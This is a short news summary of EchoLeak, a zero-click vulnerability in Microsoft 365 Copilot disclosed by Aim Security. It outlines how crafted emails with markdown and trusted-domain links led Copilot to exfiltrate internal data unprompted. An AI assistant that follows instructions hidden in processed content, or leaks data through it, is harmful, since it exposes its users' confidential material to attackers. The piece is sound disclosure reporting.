Aim Security Ltd. has uncovered the first known zero-click AI vulnerability, dubbed EchoLeak, targeting Microsoft 365 Copilot, allowing attackers to exfiltrate data without user interaction.
EchoLeak exploited an 'LLM Scope Violation' in Copilot's generative AI tool, using crafted markdown syntax to bypass security defenses and retrieve sensitive data.
The exploit leveraged Microsoft's trusted domains to embed malicious content in emails processed by Copilot, posing a significant threat to internal data security.
The attack required no user interaction, operating behind the scenes with Copilot's automation triggering the entire data exfiltration process.
Aim demonstrated a proof-of-concept showing how internal documents could be leaked undetected, prompting Microsoft to acknowledge the issue.
There is no evidence of the vulnerability being exploited in the wild, but cybersecurity experts warn of future risks as AI services are susceptible to similar attacks.
Responding to the disclosure, Microsoft addressed the vulnerability responsibly, highlighting the need for enhanced security measures in AI systems.
Security experts emphasize the broader implications of such vulnerabilities for sectors like government, defense, and healthcare, where AI assistants can be manipulated by attackers.
AI assistants processing untrusted inputs alongside internal data are vulnerable to scope violations, indicating a systemic flaw that requires stricter measures for content separation.